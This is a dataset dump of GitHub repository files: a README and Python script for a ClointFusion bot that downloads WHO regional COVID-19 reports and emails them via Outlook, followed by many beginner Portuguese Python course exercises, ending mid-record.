"text": "## WHO COVID-19 Global Region wise Reports Automation.\n---\n\n### Before Note\n\nThis is a simple Robotic Process Automation `RPA` project developed to demonstrate the power of ClointFusion Browser Automation functions. This project is presented at `ClointFusion Monthly Hackathon 9.0.` \n> Check out the Explaination of this BOT in [Youtube](https://youtu.be/6Yjvb6nmf24?t=4630)\n\n### What's this project about?\n\nThis project is a simple automation of downloading Global COVID-19 Regional wise Reports from [WHO](https://www.who.int/) Website using Python Browser Automation.This project is developed mainly using the `ClointFusion`, a Pythton based RPA package.\n\nFor more details on ClointFusion, Please refer [this](https://github.com/clointfusion/clointfusion)\n\n\nThis BOT can do the following\n- Download the Regional Wise Global COVID-19 Image Data.\n- Segregate the Reports Region wise.\n- Zip the reports and mail to the recipient\n\n### PC Requirements\n\n- A Windows/Mac/Linux running PC `Python>=3.8` installed in it.\n- Microsoft Outlook Account\n- Chrome / Firefox browser.\n\n### How to use?\n\n- Make sure You've installed `Python>=3.8` version\n- Clone this Repository.\n```\ngit clone \"https://github.com/fharookshaik/WHO-Covid-19-Global-reports-download-automation\"\n```\n- Install the dependents from `requirements.txt` \n```\npip install -r requirements.txt\n```\n- Fill your Outlook Credentisls in `credentials.json` at mentioned places.\n- Run the python file `main.py`\n\nThat's it. Within few moments BOT will do the task.\n\nThis BOT can scheduled using Task Scheduler as well.\n\n***NOTE: The Credentils will be stored within your system and this BOT do not store by any means. Triple Check the `credentials.json` before share your modified source code to others.***\n\n### BOT Working Video\n\nhttps://user-images.githubusercontent.com/47080241/125203090-8a676080-e294-11eb-9237-fbd5a32ea0ea.mp4\n\n\n## Contribution\n\nGot any bug? / Wanna improve the project?\n\n**Raise an issue or I'll happily accept a PR for new features/bug fixes** \n\n--- \n \n**Having Queries? Feel free to contact me** \n\n<div align=\"center\">\n<a href=\"https://www.linkedin.com/in/fharook-shaik\" target=\"_blank\"><img src=\"https://img.shields.io/badge/LinkedIn-%230077B5.svg?&style=flat-square&logo=linkedin&logoColor=white\" alt=\"LinkedIn\"></a> \n \n<div align=\"center\" width=\"50\">\n\n</div>\n\n \n## Happy Coding !!\n\n\n[](https://forthebadge.com)\n"
},
{
"alpha_fraction": 0.6203305125236511,
"alphanum_fraction": 0.6221358180046082,
"avg_line_length": 34.30392074584961,
"blob_id": "a56bebe6fa5392799634ef60920a001e0991b1ae",
"content_id": "c44fce0b0f2a25bd5f6ec928e552a49dc79ac751",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7201,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 204,
"path": "/main.py",
"repo_name": "fharookshaik/WHO-Covid-19-Global-reports-download-automation",
"src_encoding": "UTF-8",
"text": "# Makesure you've stored the outlook credentials in credentials.json file\n\nimport ClointFusion as cf\nimport os\nimport time\nimport shutil as sh\nimport sys\n\ncf.OFF_semi_automatic_mode()\n\n# GLOBAL vARIABLES\nWORKSPACE_DIR = os.getcwd()\nDOWNLOADS_DIR = os.path.join(WORKSPACE_DIR,'DOWNLOADS')\nREPORTS_DIR = os.path.join(WORKSPACE_DIR,'REGIONAL_REPORTS')\nREPORTS_ZIP = '.'.join([REPORTS_DIR,'zip'])\n\nWHO_LINK = 'http://www.who.int/'\nWHO_COVID_EXPLORER_LINK = 'https://worldhealthorg.shinyapps.io/covid/'\n\nGLOBAL_REGIONS = ['African Region','Region of the Americas','Eastern Mediterranean Region','European Region','South-East Asia Region','Western Pacific Region']\n\ndef instantiate_website():\n browser_state = False\n try:\n browser_state = cf.launch_website_h(URL=WHO_COVID_EXPLORER_LINK,files_download_path=DOWNLOADS_DIR)\n except Exception as e:\n print('Error in instantiate_website = %s' % e)\n finally:\n return browser_state\n\ndef _accept_terms():\n try:\n cf.browser_wait_until_h(text='I ACCEPT')\n time.sleep(2)\n cf.browser_mouse_click_h(User_Visible_Text_Element='I ACCEPT',element='d')\n \n except Exception as e:\n print('Error in accept_terms = ', str(e))\n\ndef _redirect_to_regional_overview():\n try:\n cf.browser_mouse_hover_h(User_Visible_Text_Element='Regional Overview')\n cf.browser_mouse_click_h(User_Visible_Text_Element='Regional Overview',element='d',to_left_of='Country/Area/Territory',to_right_of='Global Overview')\n\n cf.browser_wait_until_h(text='Regional Epidemic Curve')\n\n except Exception as e:\n print('Error in _redirect_to_regional_overview = ' + str(e))\n\ndef _organize_regional_data(option='',type=''):\n time.sleep(2)\n try:\n NEW_FOLDER = os.path.join(REPORTS_DIR,f'{option}')\n \n if not os.path.exists(NEW_FOLDER):\n cf.folder_create(NEW_FOLDER)\n \n files = cf.folder_get_all_filenames_as_list(strFolderPath=DOWNLOADS_DIR)\n # print(files)\n for file in files:\n file_name,ext = file.split('\\\\')[-1].split('.')\n old_file_path = os.path.join(DOWNLOADS_DIR,file)\n if type == 'CASES':\n new_file_name = '.'.join([f'{file_name}_CASES',ext])\n else:\n new_file_name = '.'.join([f'{file_name}_DEATHS',ext])\n \n cf.file_rename(old_file_path=old_file_path, new_file_name=new_file_name,ext=True)\n sh.move(src=os.path.join(DOWNLOADS_DIR,new_file_name),dst=os.path.join(NEW_FOLDER,new_file_name))\n print(f'Moved {new_file_name}')\n\n except Exception as e:\n print('Error in _organize_regional_data = ',str(e))\n sys.exit()\n\ndef _download_regional_cases_data(option=''):\n try:\n cf.browser_mouse_click_h('CASES',element='d')\n cf.browser_mouse_click_h('DOWNLOAD PLOT',element='d',)\n _organize_regional_data(option,type='CASES')\n\n except Exception as e:\n print('Error in _download_regional_cases_data = ',str(e))\n\ndef _download_regional_deaths_data(option=''):\n try:\n cf.browser_mouse_click_h('DEATHS',element='d')\n cf.browser_mouse_click_h('DOWNLOAD PLOT',element='d')\n _organize_regional_data(option,type='DEATHS')\n\n\n except Exception as e:\n print('Error in _download_regional_deaths_data = ',str(e))\n\ndef download_regional_overview_reports():\n try:\n _redirect_to_regional_overview()\n \n for option in GLOBAL_REGIONS:\n if option == 'African Region':\n prev_option = option\n \n else:\n prev_option = GLOBAL_REGIONS[GLOBAL_REGIONS.index(option) - 1]\n \n cf.browser_mouse_click_h(prev_option,element='d')\n cf.browser_mouse_click_h(option,element='d')\n time.sleep(2)\n\n _download_regional_cases_data(option)\n _download_regional_deaths_data(option)\n 
time.sleep(2)\n\n except Exception as e:\n print('Error in download_regional_overview_reports = ',str(e))\n\ndef zip_reports_dir():\n try:\n base = os.path.basename(REPORTS_ZIP)\n name,format = base.split('.')\n archive_from = os.path.dirname(REPORTS_DIR)\n archive_to = os.path.basename(REPORTS_DIR.strip(os.sep))\n sh.make_archive(name,format, archive_from,archive_to)\n \n except Exception as e:\n print('Error in _zip_reports_dir = ',str(e))\n\ndef send_outlook_email():\n try:\n CREDENTIALS_JSON = os.path.join(WORKSPACE_DIR,'credentials.json')\n outlook_details = cf.file_get_json_details(path_of_json_file=CREDENTIALS_JSON,section='Outlook')\n outlook_username = outlook_details.get('username')\n outlook_password = outlook_details.get('password')\n\n cf.browser_navigate_h('outlook.com')\n cf.browser_mouse_click_h('Sign in',element='d')\n\n cf.browser_write_h(outlook_username,User_Visible_Text_Element='Email, phone, or Skype')\n cf.browser_mouse_click_h('Next',element='d')\n\n cf.browser_write_h(outlook_password,User_Visible_Text_Element='Password')\n cf.browser_mouse_click_h('Sign in',element='d')\n\n cf.browser_mouse_click_h('New message',element='d')\n\n time.sleep(2)\n to_email = cf.gui_get_any_input_from_user('Enter to email: ')\n cf.browser_write_h(to_email,User_Visible_Text_Element='To')\n\n cf.browser_write_h('WHO COVID-19 Global Regional Reports',User_Visible_Text_Element='Add a subject')\n\n body_elem = cf.browser_locate_element_h(\"//*[@aria-label='Message body']\")\n cf.browser_write_h('Please find the attached Reports.\\n\\n\\nThanks & Regards\\nWHO COVID-19 BOT',User_Visible_Text_Element=body_elem)\n\n cf.browser_mouse_click_h(User_Visible_Text_Element='Attach',element='d')\n cf.browser_mouse_click_h(User_Visible_Text_Element='Browse this computer',element='d')\n cf.key_write_enter(strMsg=REPORTS_ZIP)\n\n time.sleep(5)\n\n cf.browser_mouse_click_h('Send',element='d')\n\n except Exception as e:\n print('Error in Sending Outlook Email = ',str(e))\n\n\nif __name__ == '__main__':\n try:\n # Emptying Previous Download Files\n if not os.path.exists(DOWNLOADS_DIR):\n cf.folder_create(strFolderPath=DOWNLOADS_DIR)\n else:\n cf.folder_delete_all_files(DOWNLOADS_DIR)\n \n # Removing REPORTS.zip\n if os.path.exists(REPORTS_ZIP):\n os.remove(REPORTS_ZIP)\n\n # Creating Reports Folder\n if not os.path.exists(REPORTS_DIR):\n cf.folder_create(REPORTS_DIR)\n else:\n cf.folder_delete_all_files(REPORTS_DIR)\n\n browser_state = instantiate_website()\n\n if browser_state == True:\n # Accept Terms & Conditions\n _accept_terms()\n\n # Downloading Regional Overview Reports\n download_regional_overview_reports()\n\n # Zip the Downloaded Reports\n zip_reports_dir()\n\n # Send Gmail\n send_outlook_email()\n\n time.sleep(5)\n cf.browser_quit_h()\n\n except Exception as e:\n print('Exception Raised = ', str(e))"
}
] | 2 |
ToninALV/Curso-em-video-Python | https://github.com/ToninALV/Curso-em-video-Python | 4ae240e474ecf97aab3b232e13d62061472a36eb | 7a9f81ba103995e9b6bb673e78aaa35649225767 | 6fc23790786e748c2aa9fb5f13c6ec7cace45e4c | refs/heads/main | 2023-03-27T18:24:16.140566 | 2021-03-30T09:53:22 | 2021-03-30T09:53:22 | 342,245,673 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5899280309677124,
"alphanum_fraction": 0.6402877569198608,
"avg_line_length": 25.399999618530273,
"blob_id": "2ac4168a98300389664417fd73e6a691c243766d",
"content_id": "dba1150f6086c6d5f2d228a1ecadd51abbe95559",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 5,
"path": "/ex007.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "n1=float(input('Digite sua 1° nota: '))\r\nn2=float(input('Digite sua 2° nota: '))\r\nsoma=n1+n2\r\nmedia=soma/2\r\nprint('Sua média é' ,media)\r\n\r\n"
},
{
"alpha_fraction": 0.6797385811805725,
"alphanum_fraction": 0.6819171905517578,
"avg_line_length": 49,
"blob_id": "76837c3599633b6bbbef097204237654398b4bb5",
"content_id": "5ade72c1203fee38239172e3b492a388505d7812",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 9,
"path": "/ex053.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "texto = str(input('Digite uma frase: '))\r\n\r\ntexto_sem_espaços = texto.replace(' ', '')\r\ntext_todo_minusculo = texto_sem_espaços.lower()\r\ntexto_invertido = text_todo_minusculo[::-1]\r\nif texto_invertido == text_todo_minusculo:\r\n print('A frase {} de trás pra frente é {}, por isso ela é um palindromo.'.format(texto, texto_invertido))\r\nelse:\r\n print('A frase {} de trás pra frente é {}, por isso ela NÃO é um palindromo.'.format(texto, texto_invertido))\r\n"
},
{
"alpha_fraction": 0.5170630812644958,
"alphanum_fraction": 0.5346432328224182,
"avg_line_length": 28.15625,
"blob_id": "af9f93a5bf95d0709e27b5413e7eb397423d2081",
"content_id": "b68500ca96fcd19dc7d3cff2cce5803839147520",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 975,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 32,
"path": "/ex070.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "\r\nmaisdemil = 0\r\ntotalgasto = 0\r\nmaisbarato = 0\r\ncont = 0\r\nbarato = ''\r\nwhile True:\r\n produto = str(input('Digite aqui o nome do Produto: '))\r\n valor = float(input('Digite aqui o valor deste produto: R$'))\r\n opção = str(input('Deseja adicionar mais produtos? [S/N]: ')).upper()\r\n cont += 1\r\n totalgasto += valor\r\n if valor > 1000:\r\n maisdemil += 1\r\n if cont == 1:\r\n maisbarato = valor\r\n barato = produto\r\n else:\r\n if valor < maisbarato:\r\n maisbarato = valor\r\n barato = produto\r\n resp = ' '\r\n print('')\r\n if opção == 'S':\r\n pass\r\n\r\n elif opção == 'N':\r\n totalgasto += valor\r\n print('')\r\n print('O Valor Total da compra é R${:.2f}'.format(totalgasto))\r\n print('Custaram mais de R$1.000, {} produtos.'.format(maisdemil))\r\n print('O produto mais barato foi {} e seu valor é de R${:.2f}'.format(barato, maisbarato))\r\n break\r\n"
},
{
"alpha_fraction": 0.6408911943435669,
"alphanum_fraction": 0.6605504751205444,
"avg_line_length": 37.94736862182617,
"blob_id": "8d502e182ba70a8dbb2ec4598dc5c026e972ece4",
"content_id": "9883accb697ac59342561030bb2301a0e4cbc9db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 772,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 19,
"path": "/ex058.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "from random import randint\r\ntotpalpitemais = 0\r\ntotpalpitemenos = 0\r\nprint('-=-' *20)\r\nprint(' Irei pensar em um número entre 0 e 10. Tente Adivinhar')\r\nprint('-=-' *20)\r\nprint('')\r\npalpite = int(input('Qual número você acha que é ? '))\r\ncomputador = randint(0, 10)\r\nwhile not palpite == computador:\r\n if palpite > computador:\r\n palpite = int(input('Muito Alto, Tente novamente: '))\r\n totpalpitemais += 1\r\n if palpite < computador:\r\n palpite = int(input('Muito baixo, Tente novamente: '))\r\n totpalpitemenos += 1\r\n\r\nprint('Parabéns o número que o computador pensou é {}...'.format(computador))\r\nprint('Foi necessário um total de {} Tentativas, para que você pudesse acertar.'.format(totpalpitemais + totpalpitemenos + 1))\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5479999780654907,
"alphanum_fraction": 0.5799999833106995,
"avg_line_length": 25.77777862548828,
"blob_id": "e5fda20cc03064b00031fc3f79e90c2a6ba1ef97",
"content_id": "91cc96490cd835b8156c0b6cb9178dfebce81ce6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 253,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 9,
"path": "/ex066.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "qtdvalores = soma = 0\r\n\r\nwhile True:\r\n n = int(input('Digite um número. [999 para parar]: '))\r\n if n == 999:\r\n break\r\n qtdvalores += 1\r\n soma += n\r\nprint(f'Você digitou um total de {qtdvalores} valores, e a soma deles é {soma}.')\r\n"
},
{
"alpha_fraction": 0.57485032081604,
"alphanum_fraction": 0.5808383226394653,
"avg_line_length": 26.60869598388672,
"blob_id": "8886585ea7a5fbb89343b7ba46c192cfb1d85430",
"content_id": "58ef44f16984d1c43deaf3f304271404cfd7bd54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 679,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 23,
"path": "/ex065.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "\r\n\r\nopção = 'S'\r\nqtdvalores = somavalores = maiorvalor = menorvalor = 0\r\n\r\n\r\n\r\nwhile opção in 'S':\r\n n = int(input('Digite um número: '))\r\n qtdvalores += 1\r\n somavalores += n\r\n if qtdvalores == 1:\r\n maiorvalor = menorvalor = n\r\n\r\n else:\r\n if n > maiorvalor:\r\n maiorvalor = n\r\n if n < menorvalor:\r\n menorvalor = n\r\n opção = str(input('Quer Continuar ? [S/N]: ')).upper()\r\n\r\nmedia = somavalores / qtdvalores\r\n\r\nprint('Você digitou um total de {} valores, e a média entre eles é {:.2f}'.format(qtdvalores, media))\r\nprint('O Maior número digitado foi {} e o Menor foi {}'.format(maiorvalor, menorvalor))\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6435185074806213,
"avg_line_length": 21.77777862548828,
"blob_id": "d28705ffafe1fdd19ba3dc7f5080c34991b31db1",
"content_id": "24b2caac5a110bd680809e03a429ff449f4de46f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 9,
"path": "/ex023.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "num = str(input('Digite um número: '))\r\nunidade = num[1]\r\ndezena = num[0]\r\ncentena = num[2]\r\nmilhar = num[3]\r\nprint('unidade', unidade)\r\nprint('dezena', dezena)\r\nprint('centena' ,centena)\r\nprint('milhar' ,milhar)\r\n\r\n"
},
{
"alpha_fraction": 0.521276593208313,
"alphanum_fraction": 0.563829779624939,
"avg_line_length": 16.799999237060547,
"blob_id": "6fae7a31c1e65b70a1aff0682a219c27ff4d981f",
"content_id": "167a7c45c649fd8617d2b0ed77747b16bf0dedf7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 5,
"path": "/ex047.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "import math\r\n\r\nfor valor in range(0, 51, 2):\r\n print(valor, end=' ')\r\nprint('ACABOU')\r\n"
},
{
"alpha_fraction": 0.6089965105056763,
"alphanum_fraction": 0.6089965105056763,
"avg_line_length": 39.28571319580078,
"blob_id": "16e0ba075b7efda624b6af25a1327a2c2cbc8b19",
"content_id": "3d88a8cd4ccbf2950d13c7e2bddc87de35e48f6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 7,
"path": "/ex057.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "sexo = str(input('Informe o seu Sexo: [M/F]')).upper()\r\nwhile sexo not in 'MF':\r\n sexo = str(input('Dados inválidos. Tente Novamente! [M/F] ')).upper()\r\nif sexo == 'M':\r\n print('Você é do sexo Masculino, Correto?')\r\nelif sexo == 'F':\r\n print('Você é so dexo Feminino, Correto?')\r\n"
},
{
"alpha_fraction": 0.447429895401001,
"alphanum_fraction": 0.519859790802002,
"avg_line_length": 19,
"blob_id": "24a7404e07d98b832f99175b8c37e4fd8972be84",
"content_id": "b77c19be496d447648c21f92e11158ed2b3cface",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 881,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 40,
"path": "/ex059.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "print('\\033[36m-=-' * 10)\r\nprint('\\033[1;97m CALCULADORA PROGRAMAVEL')\r\nprint('\\033[36m-=-' * 10)\r\nprint('')\r\nn1 = int(input('Digite um número: '))\r\nn2 = int(input('Digite outro número: '))\r\n\r\nprint(\"\"\"\\033[1;97m\r\n[1] Somar\r\n[2] Subtrair\r\n[3] Multiplicação\r\n[4] Divisão\r\n[5] Trocar os números\r\n[6] Sair do Programa\r\n\"\"\")\r\n\r\nopção = int(input('\\033[36mQual vai ser sua opção ?'))\r\n\r\n\r\nif opção == 1:\r\n print('A soma de {} + {} = {}'.format(n1, n2, (n1 + n2)))\r\n\r\n\r\nif opção == 2:\r\n print('O Resultado de {} - {} = {}'.format(n1, n2, (n1 - n2)))\r\n\r\n\r\nif opção == 3:\r\n print('O Produto de {} * {} = {}'.format(n1, n2, (n1 * n2)))\r\n\r\n\r\nif opção == 4:\r\n print('O Quociente de {} / {} = {}'.format(n1, n2, (n1/n2)))\r\n\r\nwhile opção != 5:\r\n if opção == 5:\r\n\r\n\r\nif opção == 6:\r\n print('Você decifiu fechar o programa. ADEUS!')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5055986046791077,
"alphanum_fraction": 0.6007751822471619,
"avg_line_length": 30.27777862548828,
"blob_id": "a6260aff3f3c3dc9118ca0dbd9d9bdb192a18f2d",
"content_id": "f4508ca8081025a073ff70c6b9f50815c2ddd99e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2324,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 72,
"path": "/ex045.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "import random\r\nimport time\r\n\r\nprint('\\033[1;31m{:=^40}'.format(' JOKENPO \\033[1;31m'))\r\nprint(\"\"\"\\033[1;36m\r\n[0] PEDRA\r\n[1] PAPEL\r\n[2] TESOURA\r\n \"\"\")\r\ncomputador = random.randint(0, 2)\r\nprint('')\r\njogador = int(input('\\033[1;97mEscolha uma das opções: '))\r\nprint('')\r\ntime.sleep(0.2)\r\nprint('\\033[1;95mJO')\r\ntime.sleep(0.5)\r\nprint('\\033[1;94mKEN')\r\ntime.sleep(0.5)\r\nprint('\\033[1;93mPO')\r\nprint('')\r\nitens = ('PEDRA', 'PAPEL', 'TESOURA')\r\nprint('\\033[1;97m-=-'*11)\r\nprint('Computador jogou {}'.format(itens[computador]))\r\nprint('Jogador jogou {}'.format(itens[jogador]))\r\nprint('-=-'*11)\r\nprint('')\r\nif computador == 0: # Computador jogou PEDRA\r\n if jogador == 0: # Jogador jogou PEDRA\r\n print('\\033[1;33m EMPATE')\r\n print('\\033[0;97m{} = {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 1: # Jogador jogou PAPEL\r\n print('\\033[1;97mJogador \\033[1;92m\\033[1;31mVENCEU')\r\n print('\\033[0;97m{} < {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 2: # jogador jogou TESOURA\r\n print('\\033[0;97mComputador \\033[1;31mVENCEU')\r\n print('\\033[0;97m{} > {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\nelif computador == 1: #Computador jogou PAPEL\r\n if jogador == 0:# Jogador jogou PEDRA\r\n print('\\033[0;97mComputador \\033[1;31mVENCEU')\r\n print('{} > {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 1:# Jogador jogou PAPEL\r\n print('\\033[0;33mEMPATE')\r\n print('\\033[0;97m{} = {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 2:# jogador jogou TESOURA\r\n print('\\033[0;97mJogador \\033[1;31mVENCEU')\r\n print('\\033[0;97m{} < {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\nelif computador == 2: #Computador jogou TESOURA\r\n if jogador == 0:# Jogador jogou PEDRA\r\n print('\\033[0;97mJogador \\033[1;31mVENCEU')\r\n print('\\033[0;97m{} < {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 1:# Jogador jogou PAPEL\r\n print('\\033[0;31mComputador \\033[1;31mVENCEU')\r\n print('\\033[0;97m{} > {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 2:# jogador jogou TESOURA\r\n print('\\033[1;33mEMPATE')\r\n print('\\033[0;97m{} = {}'.format(itens[computador], itens[jogador]))"
},
{
"alpha_fraction": 0.5119616985321045,
"alphanum_fraction": 0.5645933151245117,
"avg_line_length": 25.85714340209961,
"blob_id": "483ffd542001e25a66055341bffa86fc8f383a12",
"content_id": "d4dcd26162b1d43755092e28cb07d5a841dc2657",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 213,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 7,
"path": "/ex006.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "n1=int(input('Digite um número '))\r\ndois=n1*2\r\ntriplo=n1*3\r\nraiz=n1**(1/2)\r\nprint('O Dobro de' ,n1, 'é' ,dois)\r\nprint('O Triplo de' ,n1, 'é' ,triplo)\r\nprint('A raiz Quadrada de' ,n1, 'é' ,raiz)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5950000286102295,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 30.33333396911621,
"blob_id": "10267a89c43f57ee3d28e42ee9a8200d17b8c043",
"content_id": "449e6475957960d6af6896085e5a1eb7812bf06f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 200,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 6,
"path": "/ex025.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "nome = str(input('Digite seu nome: '))\r\n#split = nome.split(\" \")[0].lower()\r\n#silva = 'silva' == split\r\nsilva = 'silva' in nome.lower()\r\nprint('Olhando se seu nome tem silva...')\r\nprint(silva)\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4482758641242981,
"alphanum_fraction": 0.6081504821777344,
"avg_line_length": 19,
"blob_id": "2b075fc4a0f4187846f93af63881a12fd5d0ff94",
"content_id": "e0c06d07740e475a457ce7911ee83d6089ae4644",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 15,
"path": "/ex046.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "import time\r\n\r\nfor c in range(10, -1, -1):\r\n print('\\033[1;97m{}'.format(c))\r\n time.sleep(1)\r\nprint('\\033[1;31mKABUM')\r\ntime.sleep(0.5)\r\nprint('\\033[1;32mKABUM')\r\ntime.sleep(0.5)\r\nprint('\\033[1;33mKABUM')\r\ntime.sleep(0.5)\r\nprint('\\033[1;97mKABUM')\r\ntime.sleep(0.5)\r\nprint('\\033[1;36mKABUM')\r\ntime.sleep(0.5)\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5744680762290955,
"alphanum_fraction": 0.6003039479255676,
"avg_line_length": 26.434782028198242,
"blob_id": "d1c2292056528024beef42195260ea891927a57b",
"content_id": "c7ceaf5c28de1b4be46a359d45375e42cae74e43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 670,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 23,
"path": "/ex037.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "n1 = int(input('Digite um número para ser convertido: '))\r\nprint(' ')\r\nprint('Escolha qual vai ser a base da conversão')\r\nprint(' ')\r\nprint('[ 1 ] converter para BINARIO')\r\nprint('[ 2 ] converter para OCTAL')\r\nprint('[ 3 ] converter para HEXADECIMAL')\r\nprint(' ')\r\nop1 = int(input('Qual é a base da conversão ?'))\r\n\r\nif op1 == 1:\r\n bin = bin(n1)\r\n print('Este número em BINARIO é {}'.format(bin[2:]))\r\n\r\nelif op1 == 2:\r\n oct = oct(n1)\r\n print('Este número em OCTAL é {}'.format(oct[2:]))\r\n\r\nelif op1 == 3:\r\n hex = hex(n1)\r\n print('Este número em HEXADECIMAL é {}'.format(hex[2:]))\r\nelse:\r\n print('Opção Invalida. Tente novamente.')\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.521327018737793,
"alphanum_fraction": 0.5308057069778442,
"avg_line_length": 16.700000762939453,
"blob_id": "47aad3a7fcaba5c8bbff8537f9c095a0e409455c",
"content_id": "17aa7c746f65506ae98d322881aae20a728f64ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 216,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 10,
"path": "/ex030.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "\r\nnumber = float(input('Digite um número Qualquer: '))\r\n\r\nparimpar = (number % 2)\r\n\r\nif parimpar == 0:\r\n print('Este é um número PAR ')\r\n\r\n\r\nelse:\r\n print('Este é um número IMPAR ')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4739583432674408,
"alphanum_fraction": 0.515625,
"avg_line_length": 29.33333396911621,
"blob_id": "d9566329576d905a9b2fb51ca28dd91bce0ce1d8",
"content_id": "93b94f61a1e63b12554e7363b87fe52d52470e5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 6,
"path": "/ex050.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "soma = 0\r\nfor n in range(1, 7):\r\n n1 = int(input('Digite o {}° número: '.format(n)))\r\n if n1 % 2 == 0:\r\n soma = soma + n1\r\nprint('A soma dos número pares é {}'.format(soma))\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4763779640197754,
"alphanum_fraction": 0.5610235929489136,
"avg_line_length": 19.7391300201416,
"blob_id": "ffa09481af7327b1a1ea1615931b959dced6d76f",
"content_id": "2c58b87ceafdcc51967682ccdb3b8e08d987b017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 511,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 23,
"path": "/ex009.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
